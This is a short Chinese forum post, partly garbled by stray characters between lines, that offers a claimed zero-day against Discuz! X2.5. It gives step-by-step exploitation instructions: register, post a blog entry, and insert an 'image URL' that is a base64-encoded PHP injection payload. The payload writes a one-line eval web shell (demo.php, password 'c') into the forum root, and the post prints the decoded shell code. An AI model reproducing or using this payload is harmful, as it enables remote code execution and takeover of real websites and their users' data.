DZ X2.5最新0day/ X; X6 J4 B, M* u7 l
1.注册任意账户
; K: i# I+ \- ~6 q7 Q4 j$ s5 k2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了; h' w }; k7 T O: e* { I
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码$ x. g4 Q* K& b1 H |
<?php @eval($_POST[c]); ?>ok7 G: C) c y2 v
<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?>
; T) m: [ S9 N! \4.访问日志,论坛根目录下生成demo.php,一句发密码C |